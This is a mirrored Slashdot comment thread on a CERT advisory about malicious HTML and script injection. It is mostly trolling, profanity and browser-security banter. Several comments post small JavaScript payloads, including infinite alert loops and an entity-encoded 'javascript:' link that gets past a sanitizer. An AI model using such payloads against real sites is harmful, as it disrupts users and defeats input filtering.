Slashdot Mirror


CERT Advisory On Malicious HTML Tags

Anonymous Coward writes "Cert has published a major advisory on malicious HTML tags embedded in client Web requests. Basically, all clients and all Web servers are affected by this problem. If a Web site does not scrupulously check all input data before posting it back to the user, malicious scripts could be executed over supposedly secure and trusted connections. Recommended solutions include completely overhauling Web sites, disabling cookies and scripts, and 'Web Users Should Not Engage in Promiscuous Browsing.' Sun, Microsoft, and Apache should have notices up on their sites shortly. "

440 comments

  1. Re:Linux(Offtopic) by Anonymous Coward · · Score: 0

    Site is down.

    Smells of hot grits.

  2. Re:Maliciousness by Anonymous Coward · · Score: 0

    ActiveX exploits? What is that supposed to mean? By definition, an ActiveX control has full control over the computer and runs without any sort of sandbox. An ActiveX control can do anything a regular program can do, so it shouldn't surprise people that they can do things like format the hard drive, install viruses/trojans, reboot or lock up the computer, steal private files, etc. Nobody remotely worried about security should enable ActiveX controls, unless they are from a trusted site (i.e. a site that you would feel comfortable downloading and running programs from).

  3. Re:Let's design a... by Anonymous Coward · · Score: 0
    And that's easy???

    And what about trying to define "malicious" such that you include all the things that really are malicious (e.g. form spoofing) and none of the things that aren't, 100% guaranteed?

    While you're at it, could you write a 100% foolproof censorware program that only censored porn and nothing else? No?

    Oh, wait, you were trolling. Sometimes I take things too seriously.

  4. Linux by Anonymous Coward · · Score: 0

    Hello. I am 64 and I just got a computer a few months ago because my kids said I just had to see the internet. I am confused about an issue that is addressed specifically by this world wide web site. It seems to me that a whole group of talented young men should be doing something more productive then using your linux things to hack peoples computers. My wife, Natalie and I spent alot of money on our computer and we don't want people stealing our credit cards and hacking our things up or destroying our hard earned investments with viruses. I think that it is a travesty that this is even legal, personally it disgusts me. I hear nealy every day on the news about your people and the damage they cause to companies and how it is now possible that you are disrupting our precious military systems with your childish pranks. Well, I'd like you to know that I fought hard to give you kids the freedoms you now take for granted. I watched men die in a bloody war that I participated in, and I'll tell you something about those men. They did not die so that a bunch of punk kids could have the freedom to go aroud screwing up their country, their society, and their progeny's lives with talk of how everything should be free and that we need to "hack up the planet" as you people so elequantly put it. I think that this whole linux thing has struck a deep blow to our freedoms and has cost many good companies lots of well deserved dollars that would go to providing jobs and feeding families with your illegal activities. I wish you would put an end to all of this now and come to your senses for Christ's sake. You are advocating anarchy and lawlessness. It is my sincerest wish that the government will crack down harder on you people and make all that you do illegal so that you can stop hiding behind legal loopholes and stealing our property and livelyhoods. I refuse to see my country go down in flames due to the likes of you and will do whatever I can to carry the torch of freedom high. In good time you will all get what you deserve and all of you linux hackers will be going to jail, we good citizens just need to catch you first.

    1. Re:Linux by Anonymous Coward · · Score: 0

      This post is what they call a "troll". It is a fake just to provoke an arument. Don't give him what he wants.

    2. Re:Linux by Anonymous Coward · · Score: 0

      This is a fake posting. The language isn't consistent with a person of 64 years, nor consistent within the post.

    3. Re:Linux by Anonymous Coward · · Score: 0

      Ok. I'll bite. 1. Most hacking is done on and by Microsoft windows platforms. The majority of the attacks launched against me have been from windows machines to exploit windows exploits developed for MS OS. 2. Hacking and virus writing is not legal. You can read the papers to find examples of successful prosecution of hackers and virus writers. 3. I am sure that one of the things that you and your friends fought for was right to speak freely without fear of persecution. Successfully defending against hacking requires discussion. As often as not, this site contains warnings about vunerabilities that administrators like me need to know about. 4. If Military systems are at risk from network attack during peacetime, then it is well that we know about it now. 5. I am usure how you came to the conclusion that linux is a blow to freedom and income. Linux is a multi-billion dollar enterprise and puts food on the table for me, my company and many others. Again, if your position is that Linux is a haven for hackers, the reality is that hacking is done by and for Windows users. The development systems needed to exploit your precious machine are not available on Linux. 6. A really good citizen trys to understand a problem before asking the government to provide a solution. I think I understand the problem here finally. It has been a long time since I saw this, but you have the classic email flame disease. It comes from being able to say something without the threat of immediate feedback. Anonymous posting exacerbates the problem. Dont worry, we all had it to begin with. You just got your computer. Give it a few weeks and it will go away.

    4. Re:Linux by Anonymous Coward · · Score: 0

      CONGRATULATIONS!!

      I've been heavily into usenet for several years,
      and this is one of the best trolls I've ever seen.

    5. Re:Linux by Anonymous Coward · · Score: 0

      His wife is Natalie Portman!!!!!!!!!

    6. Re:Linux by Anonymous Coward · · Score: 0

      Actually, I hsve to agree with him on many of his statements. I am a college student majoring in electrical engineering and have been reading Slashdot for a couple months now. I don't take part in the discussions because of the domination of th "Linux Community" which seems to me a bunch of people who are out to subvert the system. I even hear people refering to themselves as "Hackers" or "Crackers" or whatever you call yourselves this week. As a reputable citizen, I can't condone the actions of hackers regardless of their philosophy. I think the act of using your low level, souped up operating system for copying (stealing) DVD's and breaking into websites is abissmal. I am happy using Windows even if it doesn't give me thes "benefits". I prefer to FOLLOW THE RULES OF SOCIETY and do not support common criminals like Mitnik or the like. I think this poster is fully justified in his views and just because a couple of games get released for a hacker's operating system doesn't change what it is or legitimize it's existence. It still remains an underground hackers operating system for people who believe that "all information should be free" REGARDLESS of the hard work of the people that created that information. I'll stick to my "lammer" Windows operating system and continue to play by the rules so I don't end up with the rest of the hackers that end up in jail as the legal system catches up to these new forms of high-tech crimes.

    7. Re:Linux by Anonymous Coward · · Score: 0

      bbwwaaaHAHAhahahahahahahahahahahaahahahhahhHHHHHAa aaaaa......HAHAHAHAHahahahahaaaaaaaahaha hahahahaahahah hahaahahahaHAHAHAHAHahahahahahahahahahaaaaaaaaaaaa aaaaa haaaaaaaaaahaaaaaaaaahaaaaaaaaaaahhhhhhhahahahahah ahhahahahaha BWahahahahahahahhaahahhaa... geez....are you *snort* for real?? hahahahahahaha...

    8. Re:Linux by Anonymous Coward · · Score: 0
      Perhaps he was talking about the Unix wars of the 80s...

      dmg

    9. Re:Linux by Anonymous Coward · · Score: 0

      No, that was Jack

    10. Re:Linux by Anonymous Coward · · Score: 0

      Did you not read the posts!!!! Jesus! We are not a bunch of illegal, criminal crackers!

    11. Re:Linux by Anonymous Coward · · Score: 0

      I just can't believe that there are ignorant people like this still out there. I am litterally speechless.

    12. Re:Linux by Anonymous Coward · · Score: 0

      I've watched rootshell and IRC and most of the script kiddie stuff is for Linux. Windows simply doesn't have the fined grain control you need to crack a server.

    13. Re:Linux by Anonymous Coward · · Score: 0

      SUCK MY BIG ASS FUCKING COCK

      YOU MAKE ME WANT TO FUCK YOU

    14. Re:Linux by Anonymous Coward · · Score: 0

      I think it is interesting that according to his age he would have been 9 when WWII ended. Way too young. A bit old for the Vietnam war (at least for the grunts which is what he makes it sound like). Of course there was the Korean war but he still would have been a little young for that one. What war is he talking about?

    15. Re:Linux by jmp100 · · Score: 0

      Uh, can someone please un-demoderate the post by the 64-year-old guy that was marked as flamebait? I think everyone needs to see what he says. It will give us good practice shooting down this type of false reasoning.

    16. Re:Linux by Pablonius · · Score: 1

      Isn't it interesting that all these flamers hide behind their AnonCoward sig. If they're really that concerned about society, why are they hiding behind their anonymity? Also, I just love how people will just believe anything they read without excercising their grey matter. DeCSS isn't about pirating DVD, it's about having the ability to play DVD titles on one's Linux boxen. Why should we be treated as second class computing citizens just because we don't bow down and worship before the Micro$oft gods.

    17. Re:Linux by um...+Lucas · · Score: 1

      I'm not 64, but I don't read CERT advisories, except when i see them posted on slashdot.

    18. Re:Linux by cepler · · Score: 1

      Anyone else smell trolls? *sniff sniff* Yup, definatly trolls around here...*looks around*

    19. Re:Linux by pepsi-guy · · Score: 1

      Did I miss something? Is there an icon of a foot on this message? Actually reading over the CERT warning I came up with a big WHO CARES! Any Perl programmer worth their weight in poop knows to validate everything. This big todo about nothing really masks the BIG ASS MICROSOFT IIS hack that I got passed today. Why isn't that up here? ... or haven't I scrolled down far enough yet.

    20. Re:Linux by Monte · · Score: 1

      They did not die so that a bunch of punk kids could have the freedom to go aroud screwing up their country, their society [yatta yatta yatta]

      Ed! Ed Anger! I was wondering where you'd gone! Good to hear from you again. Yeah, this Linux stuff just makes me pig-biting mad!

    21. Re:Linux by ericfitz · · Score: 1

      Now I can't stop humming "The Battle Hymn of the Republic".

    22. Re:Linux by Procyon101 · · Score: 1

      Linux is NOT a "Hacking" tool. Linux is a viable competitor to Microsoft Windows which you are currently using. Linux competes on the free market which you speak of, just like any operating system or program. The people who use Linux are not "Hackers" but are people who prefer this operating system. "Hackers" or, more correctly, "Crackers" are the people that you are disgusted with. The creators of Linux believe that the free flow of information WITHIN A GROUP OF PEOPLE THAT MUTUALLY SUPPORT the free flow of information is beneficial to the development of new technology. They do not steal their technology from companies, they build their own. I believe strongly in the philosophies you espouse, but you are mistaken in your view of the intent of the Linux community.

    23. Re:Linux by Quintin+Stone · · Score: 1

      C'mon, people wake up. His wife... Natalie? Portman, perhaps? This is just another troll by our neigborhood petrification nut, funny as it is. I can't believe anyone would actually take this post seriously. Gimme a break, guys! Take the blinders off already.

      --

      "Prejudice is wrong; you should hate everyone the same."

    24. Re:Linux by jmp100 · · Score: 1

      DING DING DING!!!
      We have a winner!

      This is either real or a really, really good imitation designed to draw the ire of the /. community.

      Well, in case you ARE for real, Mr. Veteran, you're barking up the wrong tree. The people who frequent this board are not the "3r33t h4x0rs" and script kiddies that go around wreaking havoc.

      Remember that movie you watched, "Hackers"? IT IS TOTALLY APOCRYPHAL.

      Do some research before you start shooting off at the mouth. The whole "I was in the war" gambit doesn't excuse insulting a whole group of people without knowing anything about them.

      Feh.

    25. Re:Linux by jmp100 · · Score: 1

      Maybe "he" was in the service for a number of years?

    26. Re:Linux by mcleodnine · · Score: 1

      Mr. Ballmer has brought up some very interesting points in his rant. He should have used something other than 'c:\windows\calc.exe' to do the age calculations.

      On an editorial note; "...that you are disrupting our precious military systems with your childish pranks." should read "...that you are disrupting our childish military systems with your precious pranks." (reader please note: this reply is a prime example of the first law of computing - GIGO)
      --
      one better than mcleodeight
    27. Re:Linux by johnfluxt · · Score: 1

      Um, I'm must admit I'm not too sure where to start...

      1) I can just see this being flamed lots & lots. I don't remember hacking being legal either...
      Also, most crackers don't cause damage. Also, most hackers are not crackers.

      bah, actaully i've decided not to persue this

    28. Re:Linux by Riot_Nrrd · · Score: 1

      Wow! Grandpa Simpson's posting to slashdot.

    29. Re:Linux by dexomn · · Score: 1

      Hello, I am 20 and just got a computer 5 years ago. I would like to touch base with you on a few points.

      1.)Linux is an operating system, it is a freely distributed clone of the unix operating system.
      (See 'Operating System'; 'UNIX')

      2.)There are *dozens* of different 'flavors' or variants of UNIX.
      (See http://www.ntlug.org/~cbbrowne/unixlist.html for a large but far-from-complete list)

      3.)UNIX was being developed by 'hackers' when you were 33 years old. (The word hacker was in use even at this time. The definition could be approximated to something as simple as 'computer enthusiast' but alas, it has been perverted by the media and the misinformed.)

      4.)You rely on unix every day.
      (Have you ever eaten at Taco Bell? Have you ever had a catscan or an x-ray at the hospital? Do you read email? Do you view web pages? Can you wager a guess at what operating system(s) keep our 'precious military systems' running? Have you ever wondered how they made those dinosaurs come to life in the movie 'Jurassic Park'? UNIX makes all of these things a reality.)

      5.) The correct term is 'Hack the planet'

      With that out of the way, please allow me to respond on a personal note.

      You speak of freedom very strongly; so strongly in fact that one may be led to beleive that your concept of freedom is very important to you. You have the freedom to express your opinion just like everyone else. You have the freedom to express your fear of something you do not understand. I find it ironic that you considder something that was created in the very spirit of freedom to have 'struck a deep blow to our freedoms'. I find it ironic that you use stereotypes and name calling to justify opinions which are grossly presented as facts. Linux/UNIX to me is a means of income, a rewarding hobby, and a great teacher. I do not use it for illegal purposes. I do not invade others' privacy, nor do I destroy anything in the process.

      They say:
      "Guns don't kill people, people kill people"
      I say:
      "Computers don't hurt people, people hurt people"

      It's all the same; user error.

      -demonx

    30. Re:Linux by SEWilco · · Score: 2

      Oh, it's a fake article. We geezers can tell. Some text vandal with nothing better to do.

    31. Re:Linux by Minty+Toothbrush · · Score: 2

      This whole reply was prepared in advance.

      Since it was posted 5 minutes after the initial story, He would have to type the whole thing fairly quickly. Now that may seem not like a big challenge in our circles to type 60+ words a minute, but how many of you can key up a post this big and make 1st? Coincidence?

      Minty Toothbrush

      .oo.
      ..

      If an infinite number of monkeys typed at an infinte number of

      --


      If an infinite number of monkeys typed at an infinte number of
      computer keyboards, they would all be
    32. Re:Linux by Picass0 · · Score: 2

      How many 64 year old internet newbees are going to 1) visit slashdot 2) read a story about CERT advisories 3) know about Linux?
      No. Someone is having fun by equating Linux users to hackers and watching the storm. Or maybe it's FUD from Micro$oft.

  5. Re:You are an insult by Anonymous Coward · · Score: 0

    Wow... A Marine geek. Didn't know there was such a thing.

  6. Re:What a stupid problem! by Anonymous Coward · · Score: 0

    SHHH. Don't let that Don Knotts guy know that.

  7. Just Exactly *Who* Is Malicious Here by Anonymous Coward · · Score: 0

    I dislike the way this advisory calls attention to the fact that user-inserted code may result in undesireable browser behavior, without bothering to address instances of site-inserted offensive or malicious code or markup. Advertiser-supported sites which repackage content such as Usenet postings are the foremost offenders here. remarQ.com, for example, is evaluating by random testing a policy under which "reserved words" in Usenet postings are arbitrarily marked up with hyperlinks pointing to sites belonging to the purchaser of the reserved word. This can result in the presence of the word "board" in a discussion of wooden vs. plastic cutting boards to create a hyperlink to a skateboard company. Amusingly enough, in the case of remarQ.com user-inserted annoying code appears more frequently when remarQ's inserted hyperlinks are called to the attention of its users. I say its a level playing field.

  8. Re: Site is down by Anonymous Coward · · Score: 0

    Maybe it's just tough to reboot an NT box with hot grits in your pants.

  9. Re:Does Amazons "one click shopping" fall under th by Anonymous Coward · · Score: 0

    Show me a link that will cause my browser to send a cookie to a different domain than it came from.

    Of course it's possible to force someone else to falsely hit a purchase link, but I didn't think it was possible to force the browser to cough up cookies it shouldn't (barring a bug in the browser).

  10. Re:Helloooooo . . . tag !! by Anonymous Coward · · Score: 0

    BO is not a "remote admin thing." It's a trojan.

    If it were a "remote admin thing" it would have a splash screen on startup that couldn't be disabled, and it would put an icon in the system tray.

    It's a trojan, and it's designed with malicious intent.

  11. hmm... by Anonymous Coward · · Score: 0

    back to gopher I guess ?


    Free Jon's computers !

  12. Re:attn: coders ... I second this! by Anonymous Coward · · Score: 0

    Don't expect anything like that from Netscape
    or IE. A big part of their bottom line is to
    <strong>sell your soul</strong>
    They could have done this years ago. More
    money in covertly developing cookies into
    what they are today. Even the name "cookie"
    is deceptive. It has no context as to what
    it's primary function is, to track you.
    Aww..look at the nice cookies....*puke*

    Break away from the commercial software world
    people. These companies are out to get you.
    They are going for your throats with these
    shrink wrap licenses and UTICA.

    <strong>hmmmmm</strong>

    *shrug* who needs the tags! :)

  13. Web pages that keep reopening self in a new window by Anonymous Coward · · Score: 0

    Often it's pr0n or w4r3z sites that do this but it's damned annoying. Worse than the blink tag.

  14. Smell trolls by Anonymous Coward · · Score: 0

    Yep, they smell like hot grits.

  15. Well.. by Anonymous Coward · · Score: 0

    history.go(-5);

  16. Re:What a stupid problem! by Anonymous Coward · · Score: 0
    The guy and everything on the site sounds really cool, but I sure would feel more comfortable if it was open source. Without lots of reassurances from people I trust both morally and technically, I am fearful of running a .exe (I'm not going to at his point, although it purports to do much of what I would like).

    Is there a site that lists stuff the community has found really trustable, with MD5's for the downloadables, so there's no question of what version etc. is being blessed?

    Is there an open source instrumented winsock to watch and log what goes out?

  17. [Re:attn: coders] iCab is answer by Anonymous Coward · · Score: 0

    iCab, a renegade web browser for the MacOS, has these features already. Plus it is a 2MB download. I'd like to see Mozilla beat that! -Ben

  18. Re:Software industry is pathetic by Anonymous Coward · · Score: 0

    Troll? I don't think you know what a troll is, Modo-drone. And developers are still irresponsible losers, BTW.

  19. Re:Yer blockin traffic grandpa by Anonymous Coward · · Score: 0

    YEAH MAN... Exactly! I mean, let's go all the way - why even bother with all this firewall crap - it just serves to make it harder to get at the stuff you want, and for others to get stuff from you. And this passwords and security stuff, I mean, well who needs them? They make it so much harder to use your computer. And protected mode operation - bah! Makes self modifying apps too hard to write!

    If you didn't notice, I'm being sarcastic... :-)

  20. Re:Malicious? by Anonymous Coward · · Score: 0

    I clicked the link and got a whole bunch of free browsers. HA! I only paid for ONE! Free Software RULEZ!

  21. Re:You are an insult by Anonymous Coward · · Score: 0

    "If I had to choose between government without the military, or the military without government, I would not hesitate to choose the latter."

    Col. Oliver North, USMC

  22. Re:This is really nothing new by Anonymous Coward · · Score: 0

    This link goes nowhere so whats the point.

  23. There is a fix here by Anonymous Coward · · Score: 0

    HTMLdk

    Thank you.

    1. Re:There is a fix here by Anonymous Coward · · Score: 0

      Hey, thanks. That seems to have fixed it.

    2. Re:There is a fix here by Anonymous Coward · · Score: 0

      HE gets me EVERY SINGLE TIME. I love it though. But Im lovin it though

    3. Re:There is a fix here by Anonymous Coward · · Score: 0

      In the old posts was "Knotts" ever spelled right? I only remember one "t", e.g., "Knots".

      These crack me up like crazy too.

    4. Re:There is a fix here by Anonymous Coward · · Score: 0

      Aw hell...I'm pretty much anti - trolls cause they are usually just plain stupid... but this one cracks me up... that goofy fucking picture of Don Knotts (arguably(sp) one of the goofiest looking guys on earth)... makes me laugh every time. I especially love it when some idiot moderator mods him up...

    5. Re:There is a fix here by Foogle · · Score: 1
      Y'know, at first I was starting to get annoyed with you and your Don Knotts garbarge. But then I realized that you're actually being fairly civil about it -- all of your links have the letters "DK" prominently displayed in them, so that I can easily filter it out. Thanks (sort of).

      -----------

      "You can't shake the Devil's hand and say you're only kidding."

  24. Re:Interesting by Anonymous Coward · · Score: 0

    I use MSIE 5, and I usually can overcome the OnMouseOver nonsense by right clicking on the URL. When it brings up the list of things to do, it usually shows me the real URL in the status window...doesn't work when stuff is scrolling in it, but it seems to work otherwise.

  25. Re:Removing popups and banner-ads by Anonymous Coward · · Score: 0

    WebWasher works very well with wine (ver 9912XX and onward) under Linux.

  26. Re:What a stupid problem! by Anonymous Coward · · Score: 0

    Add "no OnClose" option to that list

  27. Earache my eye by Anonymous Coward · · Score: 0

    Just because some tech exists in any poxy form ( syphilis is popular, too ) doesn't mean it's a Good Thing(tm). I have all this crap turned off in my browser, too, and I certainly don't suffer for it.

    I suppose you disregard condoms, too, eh sonny?

  28. Smell checking by Anonymous Coward · · Score: 0
    OK folks, now we really need our browsers to have heavy-duty cookie control, IP filtering, and perhaps even some Java, JS and html "smell-checking".

    Yeah, when Smell Mail becomes a reality, I want a web browser that can protect me from the Limburgers and Armpits of the Internet. Spam smells bad when it's rotten.

    All I can hope for is increased use of Java on sites. That's an aroma I can't live without.

    "Who cut the cheese!?!" Sorry, I forgot to run my smell checker on that document.

  29. pig-biting by Anonymous Coward · · Score: 0

    Pig biting mad nothin! I done spilled my grits all down my legs hopping up and down over this one! Cain't believe the gall of them high-fallootin hackers tearin' up the int-er-net like they all do with their dadburned linixses an all. If ma' Natalie weren't up'n petrified ahd kick the livin daylights outta evr'y last one ev em. I agree with that thar man who so valiantly defended our nation and ahd stand by his side anyday.

  30. Re:I hate that by Anonymous Coward · · Score: 0

    > "Look ma! I can spell "prophylactic"!"

    Don't worry, I'm sure your mom is real proud
    that you can spell "prophylactic".

  31. Its OK by Anonymous Coward · · Score: 0

    My Microsoft Internet browser protects me from bad things like this. I don't think Microsoft would be such a successful company if the allowed hackers to hurt their users. There are a lot of really smart people at Microsoft and I'm sure they have fixed any problem that might happen because of this.

    P.S. I also practice safe computing as Microsoft has told me, it is important to avoid "bad internet zones"!

    1. Re:Its OK by Anonymous Coward · · Score: 0

      Free Jon's computers !

      Is that anything like free beer?

      Where do I pick up this free computer?

    2. Re:Its OK by Anonymous Coward · · Score: 0

      I know you were joking but it reminded me of this article.

      http://news.excite.com/news/zd/000128/12/whats-w rong-with

      I got it off solariscentral which has a linux related article posted today... mitch

    3. Re:Its OK by Anonymous Coward · · Score: 1

      > P.S. I also practice safe computing as Microsoft has told me, it is important to avoid "bad internet zones"!

      Heh, you're in the middle of one here...


      Free Jon's computers !

  32. Re:Linux(Offtopic) by Anonymous Coward · · Score: 0
  33. Re:I Love You, Ed Anger by Anonymous Coward · · Score: 0

    I find Ed Anger's work as deeply compelling as the likes of Henry Miller and Charels Blukowski. My favorite work of his is "Heath Food Is Turning America in to a Bunch of Beedy-eyed Weaklings". Thanks Ed, Keep posting We need you! The Linux Community

  34. JavaScript bug in Netscape by Anonymous Coward · · Score: 0

    For me, the only reason NOT to turn off JavaScript under Netscape is that it also disable Style Sheet. This seems to affect all versions of Netscape under Windows/Mac/Linux. Anyone know of a workaround?

    Note: This is not a problem in Mozilla

  35. Re:Let's design a... by Anonymous Coward · · Score: 0

    oh well php offers strip_tags and addslashes functions.

  36. Isn't that obvious? by Anonymous Coward · · Score: 0

    No pr0n!

    ;-)

  37. Re:This is really nothing new by Anonymous Coward · · Score: 0

    Get a Freenet account. My freenet account at tcfreenet.org provides is a dialup shell account, and the shell is lynx. Browse the web through VT-100 and you're be fairly safe.

  38. Re:this will steal your slashdot cookies by Anonymous Coward · · Score: 0

    malicious code

  39. Re:this will steal your slashdot cookies by Anonymous Coward · · Score: 0

    malicious code

  40. Newbie Question... by Anonymous Coward · · Score: 0

    I know only a little about HTML, and hardly anything about Javascript, so I'm still trying to figure out the mechanics and implications of this alert. When I put my mouse over your link, the command line (at the bottom of the X window, I'm using Netscape 4.x under Linux BTW) I can see the Javascript that you embedded in the link. Will this always be the case? Of course, I suppose that there is always some way to make the script look harmless...

  41. Criminal crackers by Anonymous Coward · · Score: 0

    Yes I read the posts. And I agree with the old man. I DO NOT need hacking tools to do legit work on a computer. MSOffice and IE suit me just fine.

    1. Re:Criminal crackers by Anonymous Coward · · Score: 0

      hehehe.. Criminal Crackers. The new cookie from nabisco.

      I like tobite the heads off.

  42. "Rules of society" by Anonymous Coward · · Score: 0

    Just because we choose not to buy a product, doesn't mean we are breaking the "rules of society".. duh, it's called competition...

  43. Re:client-side proxies by Anonymous Coward · · Score: 0

    OnUnload unloader??? Now we have no excuses when mom walks in on the porn browsing. "I dunno... I just when to this one site and it popped outta no where!"

  44. Re:Linux(Offtopic) by Anonymous Coward · · Score: 0

    Damm you don't ruin it for the rest of them!! Its funny! I think Rob should give this guy a writing job once and a while on slashdot!

  45. Cookies. by Anonymous Coward · · Score: 0

    You can steal cookies. Therefore you can steal someone's identity online.
    Many web services rely on cookies as a mean of authentication. Get the cookie in the right timeframe, and you have full access to a user online account ( webmails being an obvious example )

  46. THE DEATH OF THE WEB IS NIGH! by Anonymous Coward · · Score: 0

    THE DEATH OF THE WEB IS NIGH !

    Way back when the Internet was still fairly young, and USENET was king, before the day that the newly created http was widespread, it was announced that the death of the 'net was at hand. Those darned newfangled http servers and the mosaic graphical "web browser" and commercialization of the Internet were deemed to be the culprits who would drive the nails into the coffin lid of the Internet. In a symbolic way, that prophecy came true. The 'net was never been the same since, and the "old way" truly has died. Now this latest CERT alert brings forth a truly grim spectre. If HTML code itself is deemed malicious, especially if such HTML can be created via user input on these such discussion group websites (even though /. has a fairly limited set of allowed tags), then simply making a link to other sites (which may have house much more evil surprises for the naiive unsuspecting websurfer, witness the latest disturbing trend of A/C's imbedding links to porn sites within /. posts, which purport those links to be something relevant to the discussion thread) may be deemed to need to be banned.

    Can this A/C actually be spouting such nonsense, suggesting that linking outside of your own site should be banned?

    Not that I support banning linking, I don't since that's one of the whole underlying fundamental concepts of the web, but there are WHOLE LOT of very powerful forces out there: government organisations, corporations and powerful individuals who despise linking and want to put an end to it. They want all websites to be explicitly self-contained, mostly for the reason of copyright and content control of their own sites. This latest alert is just the kind of weapon they are looking for to support their goals. Be prepared to fight hard to defend the right to link to URL's outside of your own sites, that war has begun now. We've already seen the first few battles, and many many more are heading straight for us at full throttle.

    Illegitimis non carborundum

  47. Re:Works in Slashdot by Anonymous Coward · · Score: 0

    Umm... that's a nice example. Moderate that up please?

  48. Re: Why store password in cookies? (Use sessions) by Anonymous Coward · · Score: 0
    > One reason you can't do that is if your site ever gets really big (like Slashdot), you can't load-balance over multiple servers.

    Of course you can. I guess you've never heard of sticky load balancing with a load manager and a session backup, eh?

    It sure is more work, but it is done routinely by various application servers and, I guess, even in-house-developed systems.

    > Also, cookies can last longer than sessions, so your site can recognize somebody the next time they visit.

    And nevertheless you force them to authenticate themselves.

    > Most web development guides recommend against using session variables.

    I don't know what "guides" you read, but every application server out there worth anything has a session manager built-in and they are all heavily used.

    Talk about misinformation...

  49. Re:This is really nothing new by Anonymous Coward · · Score: 0

    Nice one. Luckily, I opened it in another window, and thus was able to close it by holding down 'Enter' and rapidly clicking the 'close window' widget. This is in Netscape 4.7 on Win95.
    Not killer, but a nice show nontheless.

  50. There is a fix here um, doode by Anonymous Coward · · Score: 0

    uh, doode, I think the dk is for Don Knots

  51. javascript:while(1){alert('Doh!');} by Anonymous Coward · · Score: 0

    test

  52. Re:Put whatever controls you want into Mozilla by Anonymous Coward · · Score: 0
    you can get and hack your own private copy of Mozilla

    Yes, in theory.

    For some of us, our strengths lie not in writing code, but in identifying valuable features and usable interfaces.

    Translation 1: I'm too lazy to learn how to do anything -- someone do my work for me.

    Translation 2: I'm best suited for telling others what to do.

    Ya know, I had a business partner once who had a similar mindset. Thought all he had to do to keep up his end of the business was to tell me what he thought would be a good idea. Then, presumably, I'd go and lock myself up in a room coding 12 hours a day for six months, then we'd make the bucks and split the profits 50/50.

    See if you can figure out why this didn't work out so well for me.

    Those that ignore such talented (albeit different) voices

    Consider yourself ignored.

    Oh, no, wait a sec -- I've got a list of nifty ideas for projects right here. As soon as I dig 'em up, I'll expect you to get to work...

  53. javascript:while(1){alert('A');} by Anonymous Coward · · Score: 0

    test1

  54. part of what's going on here by Anonymous Coward · · Score: 0

    What might have provoked this is RemarQ's charming habit of dropping links into their version of Usenet or, more precisely, the newsgroup rec.arts.sf.fandom's response to that habit. Various people on rassef didn't like the idea that, if we had the word "board" in our posts, RemarQ would like to a snowboarding ad and make it look as though the ad was part of our posts. (It didn't help any that they include a disclaimer explicitly stating that all content was the responsibility of the Usenet poster, at the same time as they inserted links that they were being paid for.) One of the things some rassef people did--in addtion to sending in complaints--was to drop HTML into messages and headers. Some of that HTML was intended to make messages hard to read in any graphical browser (like the "blink" and "marquee" tags) and some did things like redirect the reader to a page explaining what the poster disliked about RemarQ's policies. This may, of course, be coincidence: but given that this is hardly a new vulnerability, I suspect that the fact that, suddenly, it was ordinary Internet users fighting back against a middle-sized business might have gotten someone's attention. Before everyone decides to join our crusade, I'll note that RemarQ seems to have stopped inserting links, at least for the moment. Note: this is coming from "Anonymous Coward" because I can't remember my slashdot ID; I'm Vicki Rosenzweig, http://www.redbird.org

  55. off button by Anonymous Coward · · Score: 0
    Someone should just turn the web off.

    I'm getting tired of it anyway.

  56. Who would be liable for the link? by Anonymous Coward · · Score: 0

    So if IN THEORY somebody were to go on a site for any major film studio an post a comment to a message board within that site (containing a link with malicous code) would the owner of the site be responsible?

    The same companies are running all over the place sueing any site linking to DeCSS and holding the site owner responsible for the link (even it the SySops didn't build the link), so by the same logic a link with malicious code on the studio's web site would seem to be (in part) thier liability.

    DISCLAIMER: I'm not suggesting doing anything, but I just ask the question for the subject of conversation.

  57. Re:This is really nothing new by Anonymous Coward · · Score: 0
    Better still, buy a ZX spectrum! That's really safe, and dirt cheap too!

  58. Re:Script to edit Netscape binary, remove J.Script by Anonymous Coward · · Score: 0

    Editing you binary is better than hoping people get filtering right.
    [a href="j&#97;vascript:alert('ouch')"]
    Or
    [a href="/legit/url" onMouseDown="alert('yow')"]
    And let's not forget javascript stylesheets...

  59. only sometimes by Anonymous Coward · · Score: 0
    it does not work with NS4.07/linux. Clicking does not do anything, like it's not a link at all. Too bad, I would have liked to see it. And yes, I had javascript enabled. The other examples don't work either.

    twy

  60. Lynx! by Anonymous Coward · · Score: 0

    This is why we should use lynx.

    It supports browser spoofing, site based denial of cookies, SSL support, and will *not* pop up any extra windows.

  61. new 3r33t troll tactic! by Anonymous Coward · · Score: 0

    This is my first post script.

  62. Re:This is really nothing new by Anonymous Coward · · Score: 0

    My friend Spankey thinks that you are wrong. My friend Spankey says that we should all use GEOS. That way, we wouldn't have to worry about things like this, becuase there is no Web Browser for Geos (my friend Spankey says there is, but it's just a really stupid little paint program).

    -A Friend of Spankey

  63. Tag filtering plugin. by Anonymous Coward · · Score: 0

    HTMLdk tag filter.

    Thank you.

  64. Re:Anti-Cert (Very Stupid People) by Anonymous Coward · · Score: 0

    Oh come on! The "most stupid place in the earth?"

    There have been lots of topics that "everyody knew about" that have proven to be poorly understood: IP spoofing, macros viruses, buffer overflows, weak authentication, and so on and so forth.

    For years, people have complained about advisories *after* there was a big problem, now people are bitching about an advisory that happens *before* a big problem.

    The good news is that now there is absolutely no excuse for people to commit this error in the future. How much you wanna bet *that* will be the case? Besides, the problems really is rather complex, and if you think you can describe a complete solution, then you probably don't understand all the implications.

  65. Easy Solution -> Escaping by Anonymous Coward · · Score: 0

    Escape your input stream. Old idea. One day I'll get a /. account again. Lion

  66. Javascript entities by Anonymous Coward · · Score: 0

    Nobody ever expects JavaScript entities.

    1. Re:Javascript entities by Marc+Slemko · · Score: 1

      Except that this particular example does not exploit any "new" hole and does not really exploit the problem the advisory is talking about.

      The advisory is not about pages that aren't smart enough to filter HTML that is entered by user A and displayed to user B.

      In the other examples, the posting of the link is perfectly legitimate and there is no reason to reject it because it is just a simple link; the real problem is on the 404 page. In this example, slashdot should be doing a better job of filtering HTML.

    2. Re:Javascript entities by cluke · · Score: 1

      Ah, you're right of course. I meant it was the best example of a hole in Slashdot's security, I should have been more clear.

    3. Re:Javascript entities by cluke · · Score: 2

      Jeez man, that beats them all so far!

      Mod this up someone!

      (In case it doesn't work on your machine : it pops up an alert as soon as this page loads. Works on latest Netscape release)

  67. Re:Helloooooo . . . tag !! by Anonymous Coward · · Score: 0

    Hey cDc rulez!! They were the first to make that cool remote admin thing BO. I mean nobody else had made anything like that. So back off buddy!!

  68. Re:Helloooooo . . . tag !! by Anonymous Coward · · Score: 0

    What about system32?

  69. Re:This is really nothing new by Anonymous Coward · · Score: 0

